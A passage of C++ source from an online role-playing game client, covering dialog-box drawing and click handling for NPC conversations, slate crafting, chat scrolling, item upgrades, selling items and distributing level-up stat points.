
	iTotalLines = 0;
	for (i = 0; i < DEF_TEXTDLGMAXLINES; i++)
	if (m_pMsgTextList2[i] != NULL) iTotalLines++;

	if (iTotalLines > 17) {
		d1 = (double)m_stDialogBoxInfo[21].sView;
		d2 = (double)(iTotalLines-17);
		d3 = (274.0f * d1)/d2;
		iPointerLoc = (int)d3;
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME2, sX, sY, 3);
	}
	else iPointerLoc = 0;

	if (cLB != 0 && iTotalLines > 17) {
		if ((iGetTopDialogBoxIndex() == 21)) {
			if ((msX >= sX + 240) && (msX <= sX + 260) && (msY >= sY + 40) && (msY <= sY + 320)) {
				d1 = (double)(msY -(sY+40));
				d2 = (double)(iTotalLines-17);
				d3 = (d1 * d2)/274.0f;
				iPointerLoc = (int)d3;

				if (iPointerLoc > iTotalLines) iPointerLoc = iTotalLines;
				m_stDialogBoxInfo[21].sView = iPointerLoc;
			}
		}
	}
	else m_stDialogBoxInfo[21].bIsScrollSelected = FALSE;
}

void CGame::DrawDialogBox_Slates(short msX, short msY, short msZ, char cLB)
{
 int iAdjX, iAdjY;
 short sX, sY;
 DWORD dwTime = m_dwCurTime;

	iAdjX = 5 ;
	iAdjY = 8 ;

	switch (m_stDialogBoxInfo[40].cMode) {
	// Slates Dialog - Diuuude
	case 1:
		sX = m_stDialogBoxInfo[40].sX;
		sY = m_stDialogBoxInfo[40].sY;
		iAdjX = -1;
		iAdjY = -7;

		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_INVENTORY, sX, sY, 4);

		if (m_stDialogBoxInfo[40].sV1 != -1){
			DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_INVENTORY, sX+20, sY+12, 5);
		}
		if (m_stDialogBoxInfo[40].sV2 != -1){
			DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_INVENTORY, sX+20, sY+87, 6);
		}
		if (m_stDialogBoxInfo[40].sV3 != -1){
			DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_INVENTORY, sX+85, sY+32, 7);
		}
		if (m_stDialogBoxInfo[40].sV4 != -1){
			DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_INVENTORY, sX+70, sY+97, 8);
		}

		if ((m_stDialogBoxInfo[40].sV1 != -1) && (m_stDialogBoxInfo[40].sV2 != -1) && (m_stDialogBoxInfo[40].sV3 != -1) && (m_stDialogBoxInfo[40].sV4 != -1)){
			if ((msX >= sX + 120) && (msX <= sX + 180) && (msY >= sY + 150) && (msY <= sY + 165))
				PutString_SprFont(sX + 120, sY + 150, "Casting", 6,6,20);
			else PutString_SprFont(sX + 120, sY + 150, "Casting", 0, 0, 7);
		}

		break;

	// Slates Dialog - Diuuude
	case 2:
		PlaySound('E', 16, 0);
		if (m_stDialogBoxInfo[40].cStr[0] != 0)
		{	sX = m_stDialogBoxInfo[40].sX + iAdjX + (m_stDialogBoxInfo[40].cStr[0] - (rand() % (m_stDialogBoxInfo[40].cStr[0]*2)));
			sY = m_stDialogBoxInfo[40].sY + iAdjY + (m_stDialogBoxInfo[40].cStr[0] - (rand() % (m_stDialogBoxInfo[40].cStr[0]*2)));
		}else
		{	sX = m_stDialogBoxInfo[40].sX;
			sY = m_stDialogBoxInfo[40].sY;
		}
		m_pSprite[DEF_SPRID_INTERFACE_ND_INVENTORY]->PutSpriteFast(sX, sY, 4, dwTime);
		m_pSprite[DEF_SPRID_INTERFACE_ND_INVENTORY]->PutSpriteFast(sX+22, sY+14, 3, dwTime);
		PutAlignedString(199, 438, 201, "KURURURURURURURURU!!!", 220,140,160);
		PutAlignedString(200, 439, 200, "KURURURURURURURURU!!!", 90,220,200);

		if ((dwTime - m_stDialogBoxInfo[40].dwT1) > 1000)
		{	m_stDialogBoxInfo[40].dwT1 = dwTime;
			m_stDialogBoxInfo[40].cStr[0]++;
		}
		if (m_stDialogBoxInfo[40].cStr[0] >= 5)
		{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_CREATESLATE, NULL, m_stDialogBoxInfo[40].sV1, m_stDialogBoxInfo[40].sV2, m_stDialogBoxInfo[40].sV3, NULL, m_stDialogBoxInfo[40].sV4);
			DisableDialogBox(40);
		}
		break;
	}
}

void CGame::DlgBoxClick_Slates(short msX, short msY)
{
 int iAdjX, iAdjY;
 short sX, sY;

	sX = m_stDialogBoxInfo[40].sX;
	sY = m_stDialogBoxInfo[40].sY;
	iAdjX = 5 ;
	iAdjY = 8 ;
	switch (m_stDialogBoxInfo[40].cMode) {
	// Slates DialogBox - Diuuude
	case 1:
		if ((m_stDialogBoxInfo[40].sV1 != -1) && (m_stDialogBoxInfo[40].sV2 != -1) && (m_stDialogBoxInfo[40].sV3 != -1) && (m_stDialogBoxInfo[40].sV4 != -1)){
			if ((msX >= sX + 120) && (msX <= sX + 180) && (msY >= sY + 150) && (msY <= sY + 165)){
				m_stDialogBoxInfo[40].cMode = 2;
				PlaySound('E', 14, 5);
			}
		}
		break;
	}
}

void CGame::DlgBoxClick_NpcTalk(int msX, int msY)
{
 short sX, sY;

	sX = m_stDialogBoxInfo[21].sX;
	sY = m_stDialogBoxInfo[21].sY;

	switch (m_stDialogBoxInfo[21].cMode) {
	case 0: //  OK
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			DisableDialogBox(21);
			PlaySound('E', 14, 5);
		}
		break;

	case 1: // Accept / Decline
		if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// Accept
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_QUESTACCEPTED, NULL, NULL, NULL, NULL, NULL);
			DisableDialogBox(21);
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// Cancel
			DisableDialogBox(21);
			PlaySound('E', 14, 5);
		}
		break;

	case 2:	// Next
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			DisableDialogBox(21);
			PlaySound('E', 14, 5);
		}
		break;
	}
}


void CGame::DrawDialogBox_Chat(short msX, short msY, short msZ, char cLB)
{short sX, sY;
 int i, iPointerLoc;
 double d1, d2, d3;
	sX = m_stDialogBoxInfo[10].sX;
	sY = m_stDialogBoxInfo[10].sY;
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME2, sX, sY, 4, FALSE, m_bDialogTrans);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_TEXT, sX, sY, 22, FALSE, m_bDialogTrans);

	if ( msZ != 0 && (iGetTopDialogBoxIndex() == 10)) {
		m_stDialogBoxInfo[10].sView = m_stDialogBoxInfo[10].sView + msZ/30;
		m_DInput.m_sZ = 0;
	}
	if( m_stDialogBoxInfo[10].sView < 0 ) m_stDialogBoxInfo[10].sView = 0;
	if( m_stDialogBoxInfo[10].sView > DEF_MAXCHATSCROLLMSGS-8 ) m_stDialogBoxInfo[10].sView = DEF_MAXCHATSCROLLMSGS-8; 

	d1 = (double)m_stDialogBoxInfo[10].sView;
	d2 = (double)(105.0f);
	d3 = (d1*d2)/(DEF_MAXCHATSCROLLMSGS-8); 
	iPointerLoc = (int)d3;
	iPointerLoc = 105 - iPointerLoc; 
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME2, sX + 346, sY + 33 + iPointerLoc, 7); // , 

	for (i = 0; i < 8; i++) 
	if (m_pChatScrollList[i + m_stDialogBoxInfo[10].sView] != NULL) {
		switch ( m_pChatScrollList[i + m_stDialogBoxInfo[10].sView]->m_dwTime ) {
		case 0:  PutString2(sX + 25, sY + 127  - i*13, m_pChatScrollList[i + m_stDialogBoxInfo[10].sView]->m_pMsg, 230, 230, 230); break;
		case 1:  PutString2(sX + 25 , sY + 127  - i*13, m_pChatScrollList[i + m_stDialogBoxInfo[10].sView]->m_pMsg, 130, 200, 130); break;
		case 2:  PutString2(sX + 25 , sY + 127  - i*13, m_pChatScrollList[i + m_stDialogBoxInfo[10].sView]->m_pMsg, 255, 130, 130); break;
		case 3:  PutString2(sX + 25 , sY + 127  - i*13, m_pChatScrollList[i + m_stDialogBoxInfo[10].sView]->m_pMsg, 130, 130, 255); break;
		case 4:  PutString2(sX + 25 , sY + 127  - i*13, m_pChatScrollList[i + m_stDialogBoxInfo[10].sView]->m_pMsg, 230, 230, 130); break;
		case 10: PutString2(sX + 25 , sY + 127  - i*13, m_pChatScrollList[i + m_stDialogBoxInfo[10].sView]->m_pMsg, 180, 255, 180); break;
		case 20: PutString2(sX + 25 , sY + 127  - i*13, m_pChatScrollList[i + m_stDialogBoxInfo[10].sView]->m_pMsg, 150, 150, 170); break;
		}
	}

	if ( (cLB != 0) && (iGetTopDialogBoxIndex()==10) )
	{ 	if ((msX >= sX + 336) && (msX <= sX + 361) && (msY >= sY + 28) && (msY <= sY + 140)) { //,,  
			d1 = (double)(msY - (sY + 28));
			d2 = ((DEF_MAXCHATSCROLLMSGS-8)*d1)/105.0f; 
			m_stDialogBoxInfo[10].sView = DEF_MAXCHATSCROLLMSGS - 8 - (int)d2; 
		}

		if ((msX >= sX + 336) && (msX <= sX + 361) && (msY > sY + 18) && (msY < sY + 28)) //,
			m_stDialogBoxInfo[10].sView = DEF_MAXCHATSCROLLMSGS - 8; 

		if ((msX >= sX + 336) && (msX <= sX + 361) && (msY > sY + 140) && (msY < sY + 163)) //,,,
			m_stDialogBoxInfo[10].sView = 0;
	}
	else m_stDialogBoxInfo[10].bIsScrollSelected = FALSE;
}


void CGame::DlgBoxClick_ItemUpgrade(int msX, int msY)
{short sX, sY;
 int i, iSoX, iSoM;
	sX = m_stDialogBoxInfo[34].sX;
	sY = m_stDialogBoxInfo[34].sY;
	switch (m_stDialogBoxInfo[34].cMode) {
	case 1:	// Upgrade Majestic, items in the window
		if ((m_stDialogBoxInfo[34].sV1 != -1) && (msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
		{	int iValue = (m_pItemList[m_stDialogBoxInfo[34].sV1]->m_dwAttribute & 0xF0000000) >> 28;
			iValue = iValue*(iValue+6)/8 + 2;
			if( m_iGizonItemUpgradeLeft < iValue ) break;
			PlaySound('E', 14, 5);
			PlaySound('E', 44, 0);
			m_stDialogBoxInfo[34].cMode = 2;
			m_stDialogBoxInfo[34].dwV1 = timeGetTime();
		}
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
		{	// Cancel
			PlaySound('E', 14, 5);
			DisableDialogBox(34);
		}
		break;

	case 3: // sucess
	case 4: // Not possible
	case 7: // Lost item
	case 8: // Failed
	case 9: // Failed
	case 10:// Failed
	case 12:// 12 Need stone!
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY))
		{	// OK
			PlaySound('E', 14, 5);
			DisableDialogBox(34);
		}
		break;
	case 5: // main menu
		if ((msX > sX +24) && (msX < sX +248) && (msY > sY +100) && (msY < sY +115))
		{	PlaySound('E', 14, 5);
			iSoX = iSoM = 0;
			for (i = 0; i < DEF_MAXITEMS; i++)
			if (m_pItemList[i] != NULL)
			{	if ((m_pItemList[i]->m_sSprite == 6) && (m_pItemList[i]->m_sSpriteFrame == 128)) iSoX++;
				if ((m_pItemList[i]->m_sSprite == 6) && (m_pItemList[i]->m_sSpriteFrame == 129)) iSoM++;
			}
			if ((iSoX > 0) || (iSoM > 0))
			{	m_stDialogBoxInfo[34].cMode = 6;
				m_stDialogBoxInfo[34].sV2 = iSoX;
				m_stDialogBoxInfo[34].sV3 = iSoM;
			}
			else AddEventList(DRAW_DIALOGBOX_ITEMUPGRADE30, 10); //"Stone of Xelima or Merien is not present."
		}
		if ((msX > sX +24) && (msX < sX +248) && (msY > sY +120) && (msY < sY +135))
		{	m_stDialogBoxInfo[34].cMode = 1;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
		{	// Cancel
			PlaySound('E', 14, 5);
			DisableDialogBox(34);
		}
		break;

	case 6: // Upgrade Xelima / Merien
		if ((m_stDialogBoxInfo[34].sV1 != -1) && (msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
		{	// Upgrade
			PlaySound('E', 14, 5);
			PlaySound('E', 44, 0);
			m_stDialogBoxInfo[34].cMode = 2;
			m_stDialogBoxInfo[34].dwV1 = timeGetTime();
		}
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
		{	// Cancel
			PlaySound('E', 14, 5);
			DisableDialogBox(34);
		}
		break;
	case 11:
		if ((m_stDialogBoxInfo[34].sV1 != -1) && (msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
		{	// Upgrade
			PlaySound('E', 14, 5);
			PlaySound('E', 44, 0);
			m_stDialogBoxInfo[34].cMode = 2;
			m_stDialogBoxInfo[34].dwV1 = timeGetTime();
		}
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
		{	// Cancel
			PlaySound('E', 14, 5);
			DisableDialogBox(34);
		}
		break;
	}
}

void CGame::DlgBoxClick_SellList(short msX, short msY)
{int i, x;
 short sX, sY;
 	sX = m_stDialogBoxInfo[31].sX;
	sY = m_stDialogBoxInfo[31].sY;
	for (i = 0; i < DEF_MAXSELLLIST; i++)
	if ((msX > sX + 25) && (msX < sX + 250) && (msY >= sY + 55 + i*15) && (msY <= sY + 55 + 14 + i*15))
	{	if (m_pItemList[m_stSellItemList[i].iIndex] != NULL)
		{	m_bIsItemDisabled[m_stSellItemList[i].iIndex] = FALSE;
			m_stSellItemList[i].iIndex = -1;

			PlaySound('E', 14, 5);

			// 
			for (x = 0; x < DEF_MAXSELLLIST-1; x++)
			if (m_stSellItemList[x].iIndex == -1) {
				m_stSellItemList[x].iIndex  = m_stSellItemList[x+1].iIndex;
				m_stSellItemList[x].iAmount = m_stSellItemList[x+1].iAmount;

				m_stSellItemList[x+1].iIndex  = -1;
				m_stSellItemList[x+1].iAmount = 0;
			}
		}
		return;
	}

	if ((msX >= sX + 30) && (msX <= sX + 30 + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
		// Sell
		bSendCommand(MSGID_REQUEST_SELLITEMLIST, NULL, NULL, NULL, NULL, NULL, NULL);
		PlaySound('E', 14, 5);
		DisableDialogBox(31);
	}

	if ((msX >= sX + 154) && (msX <= sX + 154 + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
		// Cancel
		PlaySound('E', 14, 5);
		DisableDialogBox(31);
	}
}

// 3.51 LevelUp Box - Diuuude
void CGame::DlgBoxClick_LevelUpSettings(short msX, short msY)
{
 short sX, sY;

	sX = m_stDialogBoxInfo[12].sX;
	sY = m_stDialogBoxInfo[12].sY;
	// Strength UP - Diuuude
	if ((msX >= sX + 195) && (msX <= sX + 205) && (msY >= sY + 127) && (msY <= sY + 133) && (m_iLU_Point > 0) && (m_cLU_Str + m_iStr < DEF_STATS_LIMIT))
	{	
		if (m_bShiftPressed == TRUE)
		{	if ((m_iLU_Point >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 10;
				m_cLU_Str += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_iLU_Point >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 5;
				m_cLU_Str += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_iLU_Point > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point--;
				m_cLU_Str++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Vitality UP - Diuuude
	if ((msX >= sX + 195) && (msX <= sX + 205) && (msY >= sY + 146) && (msY <= sY + 152) && (m_iLU_Point > 0) && (m_cLU_Vit + m_iVit < DEF_STATS_LIMIT))
	{	
		if (m_bShiftPressed == TRUE)
		{	if ((m_iLU_Point >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 10;
				m_cLU_Vit += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_iLU_Point >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 5;
				m_cLU_Vit += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_iLU_Point > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point--;
				m_cLU_Vit++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Dexterity UP - Diuuude
	if ((msX >= sX + 195) && (msX <= sX + 205) && (msY >= sY + 165) && (msY <= sY + 171) && (m_iLU_Point > 0) && (m_cLU_Dex + m_iDex < DEF_STATS_LIMIT))
	{	
		if (m_bShiftPressed == TRUE)
		{	if ((m_iLU_Point >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 10;
				m_cLU_Dex += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_iLU_Point >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 5;
				m_cLU_Dex += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_iLU_Point > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point--;
				m_cLU_Dex++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Intelligence UP - Diuuude
	if ((msX >= sX + 195) && (msX <= sX + 205) && (msY >= sY + 184) && (msY <= sY + 190) && (m_iLU_Point > 0) && (m_cLU_Int + m_iInt < DEF_STATS_LIMIT))
	{	
		if (m_bShiftPressed == TRUE)
		{	if ((m_iLU_Point >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 10;
				m_cLU_Int += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_iLU_Point >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 5;
				m_cLU_Int += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_iLU_Point > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point--;
				m_cLU_Int++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Magic UP - Diuuude
	if ((msX >= sX + 195) && (msX <= sX + 205) && (msY >= sY + 203) && (msY <= sY + 209) && (m_iLU_Point > 0) && (m_cLU_Mag + m_iMag < DEF_STATS_LIMIT))
	{	
		if (m_bShiftPressed == TRUE)
		{	if ((m_iLU_Point >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 10;
				m_cLU_Mag += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_iLU_Point >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 5;
				m_cLU_Mag += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_iLU_Point > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point--;
				m_cLU_Mag++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Charisma UP - Diuuude
	if ((msX >= sX + 195) && (msX <= sX + 205) && (msY >= sY + 222) && (msY <= sY + 228) && (m_iLU_Point > 0) && (m_cLU_Char + m_iCharisma < DEF_STATS_LIMIT))
	{	
		if (m_bShiftPressed == TRUE)
		{	if ((m_iLU_Point >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 10;
				m_cLU_Char += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_iLU_Point >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point -= 5;
				m_cLU_Char += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_iLU_Point > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_iLU_Point--;
				m_cLU_Char++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Strength DOWN - Diuuude
	if ((msX >= sX + 210) && (msX <= sX + 220) && (msY >= sY + 127) && (msY <= sY + 133) && (m_cLU_Str > 0))
	{	
		if (m_bShiftPressed == TRUE)
		{	if ((m_cLU_Str >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Str -= 10;
				m_iLU_Point += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_cLU_Str >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Str -= 5;
				m_iLU_Point += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_cLU_Str > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Str--;
				m_iLU_Point++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Vitality DOWN - Diuuude
	if ((msX >= sX + 210) && (msX <= sX + 220) && (msY >= sY + 146) && (msY <= sY + 152) && (m_cLU_Vit > 0))
	{	if (m_bShiftPressed == TRUE)
		{	if ((m_cLU_Vit >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Vit -= 10;
				m_iLU_Point += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_cLU_Vit >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Vit -= 5;
				m_iLU_Point += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_cLU_Vit > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Vit--;
				m_iLU_Point++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Dexterity DOWN - Diuuude
	if ((msX >= sX + 210) && (msX <= sX + 220) && (msY >= sY + 165) && (msY <= sY + 171) && (m_cLU_Dex > 0))
	{	if (m_bShiftPressed == TRUE)
		{	if ((m_cLU_Dex >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Dex -= 10;
				m_iLU_Point += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_cLU_Dex >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Dex -= 5;
				m_iLU_Point += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_cLU_Dex > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Dex--;
				m_iLU_Point++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Intelligence DOWN - Diuuude
	if ((msX >= sX + 210) && (msX <= sX + 220) && (msY >= sY + 184) && (msY <= sY + 190) && (m_cLU_Int > 0))
	{	if (m_bShiftPressed == TRUE)
		{	if ((m_cLU_Int >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Int -= 10;
				m_iLU_Point += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_cLU_Int >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Int -= 5;
				m_iLU_Point += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_cLU_Int > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Int--;
				m_iLU_Point++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Magic DOWN - Diuuude
	if ((msX >= sX + 210) && (msX <= sX + 220) && (msY >= sY + 203) && (msY <= sY + 209) && (m_cLU_Mag > 0))
	{	if (m_bShiftPressed == TRUE)
		{	if ((m_cLU_Mag >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Mag -= 10;
				m_iLU_Point += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_cLU_Mag >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Mag -= 5;
				m_iLU_Point += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_cLU_Mag > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Mag--;
				m_iLU_Point++;
			}
			PlaySound('E', 14, 5);
	}	}

	// Charisma DOWN - Diuuude
	if ((msX >= sX + 210) && (msX <= sX + 220) && (msY >= sY + 222) && (msY <= sY + 228) && (m_cLU_Char > 0))
	{	if (m_bShiftPressed == TRUE)
		{	if ((m_cLU_Char >= 10)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Char -= 10;
				m_iLU_Point += 10;
			}
			PlaySound('E', 14, 5);
		}else if (m_bCtrlPressed == TRUE)
		{	if ((m_cLU_Char >= 5)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Char -= 5;
				m_iLU_Point += 5;
			}
			PlaySound('E', 14, 5);
		}else
		{	if ((m_cLU_Char > 0)&&(m_bIsDialogEnabled[42] == FALSE))
			{	m_cLU_Char--;
				m_iLU_Point++;
			}
			PlaySound('E', 14, 5);
	}	}

	if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY))
	{	if (m_stDialogBoxInfo[12].sV1 != m_iLU_Point)
		// Send command to HG - Diuuude, Only if changed - Snoopy
		bSendCommand(MSGID_LEVELUPSETTINGS, NULL, NULL, NULL, NULL, NULL, NULL);
		DisableDialogBox(12);
		PlaySound('E', 14, 5);
	}
	if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY))
	{	// Change stats with Majestic
		if (   (m_iGizonItemUpgradeLeft >0) && (m_iLU_Point <= 0)
			&& (m_cLU_Str == 0)&&(m_cLU_Vit == 0)&&(m_cLU_Dex == 0)&&(m_cLU_Int == 0)&&(m_cLU_Mag == 0)&&(m_cLU_Char == 0))
		{	DisableDialogBox(12);
			EnableDialogBox(42, 0, 0, 0);
	}	}
}

void CGame::CannotConstruct(int iCode)
{
	switch (iCode) {
	case 1: //
		SetTopMsg(m_pGameMsgList[18]->m_pMsg, 5);
		break;

	case 2: //
		wsprintf(G_cTxt, "%s XY(%d, %d)", m_pGameMsgList[19]->m_pMsg, m_iConstructLocX, m_iConstructLocY);
		SetTopMsg(G_cTxt, 5);
		break;

	case 3: //
	case 4: //
		SetTopMsg(m_pGameMsgList[20]->m_pMsg, 5);
		break;

	}
}

void CGame::DisplayCommaNumber_G_cTxt(int iGold)
{char cGold[20];
 int iStrLen;
	ZeroMemory(cGold, sizeof(cGold));
	ZeroMemory(G_cTxt, sizeof(G_cTxt));
	itoa(iGold, cGold, 10);
	iStrLen = strlen(cGold);
	iStrLen--;
	int cnt = 0;
	for (int i = 0 ; i < iStrLen+1 ; i++)
	{	if( (cnt != 0) && ((cnt+1)%4 == 0) )
		{	G_cTxt[cnt] = ',';
			i--;
		}else G_cTxt[cnt] = cGold[iStrLen-i];
		cnt++;
	}
	iStrLen = strlen(G_cTxt);
	G_cTxt[iStrLen] = '\0';
	strrev(G_cTxt);
}

void CGame::DrawDialogBox_Inventory(int msX, int msY)
{int i;
 short sX, sY;
 DWORD dwTime = m_dwCurTime;
 char cItemColor;
 int uTotalItem = 0;
	sX = m_stDialogBoxInfo[2].sX;
	sY = m_stDialogBoxInfo[2].sY;
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_INVENTORY, sX, sY, 0);
	for (i = 0; i < DEF_MAXITEMS; i++)
	if ((m_cItemOrder[i] != -1) && (m_pItemList[m_cItemOrder[i]] != NULL))
	{	uTotalItem++;
		if (   ((m_stMCursor.cSelectedObjectType == DEF_SELECTEDOBJTYPE_ITEM)
			&& (m_stMCursor.sSelectedObjectID   ==	m_cItemOrder[i])) || (m_bIsItemEquipped[m_cItemOrder[i]] == TRUE) )
		{}else
